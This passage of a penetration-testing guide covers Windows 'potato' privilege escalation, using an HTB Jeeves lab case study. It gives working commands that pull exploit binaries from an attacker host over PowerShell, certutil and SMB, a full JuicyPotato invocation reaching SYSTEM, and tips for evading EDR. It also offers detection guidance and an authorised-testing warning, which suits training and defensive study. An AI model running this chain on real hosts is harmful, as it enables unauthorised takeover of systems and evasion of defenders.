    421   <figcaption class="flow__cap"><span class="flow__kind">Run a potato — the loop</span><span class="flow__dir">TD</span></figcaption>
    422   <div class="flow__body">
    423     <svg class="flow-svg" viewBox="0 0 790 700" role="img" aria-label="Enumerate privileges, pick a tool by OS era, transfer and fire it, check for SYSTEM; on failure switch tool and retry, on success move to SYSTEM recon">
    424       <path class="fedge" d="M300,90 L300,140" marker-end="url(#flow-arrow)" />
    425       <path class="fedge" d="M300,200 L300,250" marker-end="url(#flow-arrow)" />
    426       <path class="fedge" d="M300,310 L300,360" marker-end="url(#flow-arrow)" />
    427       <path class="fedge" d="M300,420 L300,470" marker-end="url(#flow-arrow)" />
    428       <path class="fedge" d="M300,530 L300,600" marker-end="url(#flow-arrow)" />
    429       <path class="fedge is-back" d="M425,500 L620,500 L620,200" marker-end="url(#flow-arrow)" />
    430       <path class="fedge is-back" d="M495,170 L427,170" marker-end="url(#flow-arrow)" />
    431       <g class="fnode is-entry"><rect class="fnode__box" x="175" y="30" width="250" height="60" /><text class="fnode__label" x="300" y="56" text-anchor="middle">1 · whoami /priv + /groups<tspan class="sub" x="300" dy="15">SeImpersonate? SERVICE token?</tspan></text></g>
    432       <g class="fnode"><rect class="fnode__box" x="175" y="140" width="250" height="60" /><text class="fnode__label" x="300" y="166" text-anchor="middle">2 · systeminfo → OS build<tspan class="sub" x="300" dy="15">choose tool by DCOM era</tspan></text></g>
    433       <g class="fnode"><rect class="fnode__box" x="175" y="250" width="250" height="60" /><text class="fnode__label" x="300" y="276" text-anchor="middle">3 · Transfer the binary<tspan class="sub" x="300" dy="15">certutil / IWR / SMB share</tspan></text></g>
    434       <g class="fnode"><rect class="fnode__box" x="175" y="360" width="250" height="60" /><text class="fnode__label" x="300" y="386" text-anchor="middle">4 · Fire non-interactively<tspan class="sub" x="300" dy="15">output → a file you can read</tspan></text></g>
    435       <g class="fnode is-decision"><rect class="fnode__box" x="175" y="470" width="250" height="60" /><text class="fnode__label" x="300" y="496" text-anchor="middle">authresult 0 /<tspan class="sub" x="300" dy="15">NT AUTHORITY\SYSTEM?</tspan></text></g>
    436       <g class="fnode is-note"><rect class="fnode__box" x="495" y="140" width="250" height="60" /><text class="fnode__label" x="620" y="166" text-anchor="middle">Wrong tool for the era —<tspan class="sub" x="620" dy="15">switch potato, not port</tspan></text></g>
    437       <g class="fnode is-goal"><rect class="fnode__box" x="175" y="600" width="250" height="66" /><text class="fnode__label" x="300" y="622" text-anchor="middle">5 · SYSTEM recon:<tspan class="sub" x="300" dy="14">dir /r other profiles → read ADS,</tspan><tspan class="sub" x="300" dy="14">creds, hives, flags</tspan></text></g>
    438       <g class="felabel"><rect class="felabel__box" x="283" y="557" width="34" height="16" /><text class="felabel__text" x="300" y="568" text-anchor="middle">Yes</text></g>
    439       <g class="felabel"><rect class="felabel__box" x="507" y="492" width="26" height="16" /><text class="felabel__text" x="520" y="503" text-anchor="middle">No</text></g>
    440     </svg>
    441   </div>
    442 </figure>
    443 
    444 ### 1 · Spot the opportunity — is your token weaponisable? `fas:Terminal`
    445 
    446 Two commands tell you whether a potato is even on the table:
    447 
    448 ```batch
    449 whoami /priv      :: look for SeImpersonatePrivilege / SeAssignPrimaryTokenPrivilege
    450 whoami /groups    :: look for NT AUTHORITY\SERVICE (S-1-5-6) and the integrity level
    451 ```
    452 
    453 `whoami /priv` is the direct check, but on stripped shells it's sometimes truncated or lies. `whoami /groups` is the corroborating tell: membership in **`NT AUTHORITY\SERVICE` (S-1-5-6)** means you're running as a *service*, and service accounts almost always carry `SeImpersonate`. A `High Mandatory Level` label alongside it says the process is already high-integrity — common for service RCE. That combination (`BUILTIN\Users` + `NT AUTHORITY\SERVICE` + High integrity) is the fingerprint of "web/app service account that can be potatoed," even before you confirm the privilege.
    454 
    455 Where you land in that context:
    456 
    457 - **IIS AppPool** identities (ASPX/PHP web shells on IIS).
    458 - **MSSQL** service accounts (`xp_cmdshell`).
    459 - **App-server RCE** — Jenkins, Tomcat, GitLab runners, ColdFusion. *On Jeeves this is an unauthenticated Jenkins script console on `:50000`, running as `JEEVES\kohsuke` — `whoami /groups` shows `NT AUTHORITY\SERVICE` and High integrity, so the privilege is there even though `whoami /priv` output was minimal.*
    460 - Any **cracked service credential** you can `runas`/`psexec` with.
    461 
    462 ### 2 · Fingerprint the host — the DCOM era decides your tool `fas:MagnifyingGlass`
    463 
    464 This is the step most write-ups skip, and it's why "just run the newest potato" fails. Get the exact build first:
    465 
    466 ```batch
    467 systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
    468 :: or, quicker:
    469 ver
    470 ```
    471 ```powershell
    472 [environment]::OSVersion.Version   # e.g. 10.0.10586.0
    473 ```
    474 
    475 Now the concept that ties the whole family together — **the DCOM hardening line of September 2018 (Windows 10 1809 / Server 2019):**
    476 
    477 - The **original** RottenPotato → JuicyPotato technique abuses `CoGetInstanceFromIStorage`: it kicks off a DCOM activation of a SYSTEM-owned CLSID and hands it a marshalled object that points OXID resolution at **`127.0.0.1:<your -l port>`**. `RPCSS` (SYSTEM) dutifully authenticates to that local port over NTLM; the tool catches that auth, negotiates a SYSTEM token, and impersonates it. Pick a CLSID that runs as SYSTEM and a free local port, and it fires.
    478 - The **1809 / Server 2019 patch** changed DCOM so that OXID resolution no longer honours your custom port — it's forced back to port 135. That single change **killed the original JuicyPotato on 1809 and later.**
    479 - **JuicyPotatoNG** (decoder_it & splinter_code) is the *re-do for the post-patch world*: it uses a different CLSID (the PrintNotify service, `{854A20FB-2D44-457D-992F-EF13785D2B51}`, on default port 10247) and a local SSPI/COM negotiation trick that survives the hardening. **PrintSpoofer** (Spooler named pipe) and **GodPotato** (in-process fake OXID resolver) are the other post-patch answers.
    480 
    481 So legacy and NG are built for **opposite eras**, and newer is not better:
    482 
    483 | Target build | First choice | Why |
    484 |---|---|---|
    485 | Win10 ≤ 1803 / Server 2016 / **build 10586** | **Legacy JuicyPotato** | Pre-hardening — the `-l`-port OXID redirect still works; NG/GodPotato often *don't* on these old builds |
    486 | Win10 1809+ / Server 2019+ / Win11 | **PrintSpoofer** (Spooler up) → **GodPotato** → **JuicyPotatoNG** | Post-hardening — the original is dead; these are the workarounds |
    487 
    488 Check the Spooler if you're eyeing PrintSpoofer: `sc query spooler` → `RUNNING`. Per-OS CLSID tables for JuicyPotato live at [ohpe.it/juicy-potato/CLSID](http://ohpe.it/juicy-potato/CLSID/); the **BITS** CLSID `{4991d34b-80a1-4291-83b6-3328366b9097}` is a dependable SYSTEM-owning pick across many builds.
    489 
    490 ### 3 · Land the binary when the box has no download tools `fas:RocketLaunch`
    491 
    492 Old and minimal Windows often has **no `curl`, no `wget`, no `certutil` you can rely on** (`curl.exe` only shipped with build 17063 in 2017 — Jeeves' 10586 has none of them). Work down this ladder:
    493 
    494 ```powershell
    495 # Best case — PowerShell is present
    496 Invoke-WebRequest http://10.10.14.3/jp.exe -OutFile C:\Users\kohsuke\jp.exe
    497 (New-Object Net.WebClient).DownloadFile('http://10.10.14.3/jp.exe','C:\Users\kohsuke\jp.exe')
    498 ```
    499 ```batch
    500 :: If certutil exists
    501 certutil -urlcache -f http://10.10.14.3/jp.exe C:\Users\kohsuke\jp.exe
    502 ```
    503 
    504 When none of those work, fall back to an **SMB share** — the reliable transport on stripped hosts:
    505 
    506 ```bash
    507 # On your box — SMBv2 + auth (modern Windows refuses guest/anonymous SMB)
    508 impacket-smbserver SHARE /tmp/share -smb2support -user temp -password temp
    509 ```
    510 ```batch
    511 :: On the target — map, copy, then clean up the mapping when done
    512 net use Z: \\10.10.14.3\SHARE /user:temp temp
    513 copy Z:\JuicyPotato.exe .
    514 copy Z:\nc64.exe .
    515 ... :: run your attack
    516 net use Z: /delete
    517 ```
    518 
    519 Stage into a directory your account owns and can execute from — your own profile (`C:\Users\<you>\`) or `C:\Windows\Temp`. You can also run straight off the share (`Z:\jp.exe ...`) if you'd rather not drop the file.
    520 
    521 ### 4 · Fire it non-interactively and actually read the output `fas:Terminal`
    522 
    523 Legacy JuicyPotato, GodPotato, EfsPotato and RoguePotato **don't hand you a shell** — they run one command as SYSTEM and exit. So make SYSTEM write its output somewhere your low-priv user can read, then read it back:
    524 
    525 ```batch
    526 JuicyPotato.exe -l 53375 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p C:\Windows\System32\cmd.exe -a "/c whoami > C:\Users\kohsuke\out.txt 2>&1" -t *
    527 type C:\Users\kohsuke\out.txt
    528 ```
    529 
    530 The three knobs, and the traps behind each:
    531 
    532 - **`-t *`** — try both `CreateProcessWithTokenW` (needs SeImpersonate) and `CreateProcessAsUser` (needs SeAssignPrimaryToken). A win prints `[+] authresult 0` and `NT AUTHORITY\SYSTEM`.
    533 - **`-l <port>` — a free local port.** Confirm with `netstat -ano | findstr ":53375 "` (no output = free). **Trap:** a *failed* run also produces the output file — from your redirect, not from SYSTEM. Always `type` it and confirm it says `nt authority\system`; an empty file or a `whoami` usage error means the exploit didn't run, not that you're SYSTEM.
    534 - **`-a "<args>"` must be one clean line.** **Trap seen live:** pasting a long command into a raw shell can wrap the line and split the `-a` string, so `whoami` runs with a stray argument and your output file contains `ERROR: Invalid argument/option - ''`. That's a mangled paste, not a broken exploit — retype it on one line.
    535 
    536 > [!warning]+ "The privileged process failed to communicate with our COM Server" is (usually) not a port problem
    537 > `fas:TriangleExclamation`
    538 > JuicyPotatoNG prints this same line whenever no SYSTEM authentication reaches its local COM server within its ~3-second window — and it *suggests* trying another `-l` port, which sends people down a rabbit hole. If you've already confirmed the port is free (or `-s` says the firewall is off and every port should work) and it still fails on **every** port and **every** CLSID, the port was never the issue: **the trigger is incompatible with this OS build.** NG's CLSID triggers and local TCP handling were engineered for post-1809 Windows; on a pre-hardening build like 10586 the privileged process never routes its auth back to NG's socket, so it times out with the generic error. GodPotato can fail on the same old builds too — its OXID unmarshal returns `0x80070776` (`OR_INVALID_OXID`, "the object exporter specified was not found") and it reports `Failed to impersonate security context token`. The fix is not a different port; it's the **era-correct tool** — drop to the original JuicyPotato, which uses the pre-hardening technique the box still permits.
    539 
    540 ### 5 · Once you're SYSTEM `fas:MagnifyingGlass`
    541 
    542 SYSTEM opens every other profile on the box — and that's where the interesting things hide: credentials, KeePass databases, second-stage tooling, and data other users tucked into **NTFS Alternate Data Streams**, invisible to a plain `dir`. Make `dir /r` a reflex on every profile and desktop you couldn't read before. The full mechanics — reading, finding, hiding streams, and Mark-of-the-Web — plus a worked example of finding and reading a flag hidden this way, are in the [Alternate Data Streams guide](/sheets/pentest-workflow/alternate-data-streams-guide#finding-hidden-data--a-worked-example).
    543 
    544 > [!example]+ Case study — HTB Jeeves (build 10586): the sequence that actually worked
    545 > `fas:Spider`
    546 > Every "newer" potato failed here, which is the whole lesson. The console showed:
    547 > - `PrintSpoofer64.exe` / `JuicyPotatoNG.exe` — *not staged yet* (`not recognized`), so transfer first.
    548 > - `JuicyPotatoNG` (default PrintNotify CLSID on 10247, then ports 9999 / 53375, then BITS CLSID) — **every attempt** returned `failed to communicate with our COM Server`. Not a port problem: 10586 is pre-hardening, so NG's trigger never completes.
    549 > - `GodPotato-NET4` — `UnmarshalObject: 0x80070776` → `Failed to impersonate security context token`. Same story: OXID unmarshal doesn't resolve on this build.
    550 >
    551 > The era-correct tool won on the first try:
    552 > ```batch
    553 > :: 1) no curl/wget/certutil — pull tools over SMB
    554 > net use Z: \\10.10.14.197\SHARE /user:temp temp
    555 > copy Z:\JuicyPotato.exe .
    556 > :: 2) legacy JuicyPotato, BITS CLSID, free port → SYSTEM
    557 > JuicyPotato.exe -l 53375 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p C:\Windows\System32\cmd.exe -a "/c whoami > C:\Users\kohsuke\system-check.txt 2>&1" -t *
    558 > type system-check.txt          :: -> nt authority\system   ([+] authresult 0 / CreateProcessWithTokenW OK)
    559 > ```
    560 > From here, `dir /r` on `C:\Users\Administrator\Desktop` turns up a file with a named stream — walked through in the [ADS guide's worked example](/sheets/pentest-workflow/alternate-data-streams-guide#finding-hidden-data--a-worked-example), using this exact box.
    561 
    562 > [!success]+ The transferable checklist
    563 > `fas:Lightbulb`
    564 > 1. **`whoami /priv` *and* `/groups`** — `SeImpersonate`, or `NT AUTHORITY\SERVICE` + High integrity, means go.
    565 > 2. **`systeminfo` first** — the OS build, not the calendar, picks the tool. Pre-1809 → original JuicyPotato; 1809+ → PrintSpoofer / GodPotato / NG.
    566 > 3. **No download tools? Use an SMB share** (`impacket-smbserver -smb2support -user … -password …` ↔ `net use`), then `net use … /delete`.
    567 > 4. **No shell? Redirect to a file you own** and `type` it back — and *read* it to confirm `nt authority\system`, since a failed run leaves a file too.
    568 > 5. **A generic "try another port" error on every port = wrong tool for the era, not the wrong port.**
    569 > 6. **`dir /r` every profile you couldn't read before** — flags, creds, and payloads get parked in ADS.
    570 
    571 ---
    572 
    573 ## Detection, OPSEC & cleanup `fas:Shield`
    574 
    575 > [!danger] Authorised testing only
    576 > `fas:TriangleExclamation`
    577 > Potato attacks land you SYSTEM on a real host. Run these only against systems you're explicitly authorised to test. Track every binary, user, and hive dump you create, with full paths, and remove them at cleanup.
    578 
    579 **What the blue team sees:**
    580 
    581 | Signal | Where |
    582 |---|---|
    583 | `4672` Special privileges assigned to new logon; `4624` logon type 9 (new credentials) | Security log — the token-impersonation moment |
    584 | `4688` process creation — a service account spawning `cmd.exe`/`nc64.exe`/unknown EXE from `C:\Windows\Temp` | Security log / Sysmon Event 1 |
    585 | Named-pipe creation on `\pipe\spoolss` and odd DCOM/RPC activity | Sysmon Events 17/18 (pipe), 3 (network) |
    586 | Files/EXEs written to `C:\Windows\Temp`, spooler dirs | Sysmon Event 11 |
    587 
    588 **OPSEC notes:**
    589 
    590 - Potatoes touch high-signal primitives (Spooler pipe, DCOM). On a monitored estate expect EDR to alert — don't burn a careful engagement on a noisy `net user ... /add`. Prefer a SYSTEM shell/token to standing up a new account.
    591 - `C:\Windows\Temp` is convenient but heavily watched. Rename binaries to something dull; don't leave `GodPotato.exe` on disk.
    592 
    593 **Cleanup checklist:**
    594 
    595 ```powershell
    596 Remove-Item C:\Windows\Temp\ps.exe, C:\Windows\Temp\g.exe -Force -ErrorAction SilentlyContinue
    597 Remove-Item C:\Windows\Temp\sam.sav, C:\Windows\Temp\sys.sav -Force -ErrorAction SilentlyContinue
    598 net user backdoor /del 2>$null                                                     # if you created one
    599 ```
    600 
    601 Staged a payload inside an ADS as part of this chain? The [Alternate Data Streams guide's cleanup section](/sheets/pentest-workflow/alternate-data-streams-guide#detection-opsec--cleanup-fasshield) covers removing streams.
    602 
    603 ---
    604 
    605 ## References `fas:BookOpen`
    606 
    607 | Tool / topic | Source |
    608 |---|---|
    609 | PrintSpoofer | [github.com/itm4n/PrintSpoofer](https://github.com/itm4n/PrintSpoofer) · [itm4n write-up](https://itm4n.github.io/printspoofer-abusing-impersonation-privileges/) |
    610 | GodPotato | [github.com/BeichenDream/GodPotato](https://github.com/BeichenDream/GodPotato) |
    611 | JuicyPotatoNG | [github.com/antonioCoco/JuicyPotatoNG](https://github.com/antonioCoco/JuicyPotatoNG) |
    612 | JuicyPotato (legacy) | [github.com/ohpe/juicy-potato](https://github.com/ohpe/juicy-potato) |
    613 | RoguePotato | [github.com/antonioCoco/RoguePotato](https://github.com/antonioCoco/RoguePotato) |
    614 | EfsPotato | [github.com/zcgonvh/EfsPotato](https://github.com/zcgonvh/EfsPotato) |
    615 | SweetPotato | [github.com/CCob/SweetPotato](https://github.com/CCob/SweetPotato) |
    616 | The Potato family, explained | [jlajara.gitlab.io — potatoes](https://jlajara.gitlab.io/Potatoes_Windows_Privesc) |
    617 
    618 ---
    619 
    620 [← Windows PrivEsc cheat sheet](/sheets/pentest-workflow/privilege-escalation) · [Workflow dashboard](/sheets/pentest-workflow/attack-flow-dashboard) · [Windows PrivEsc master guide](/sheets/privilege-escalation/windows-privesc) · [Alternate Data Streams guide →](/sheets/pentest-workflow/alternate-data-streams-guide)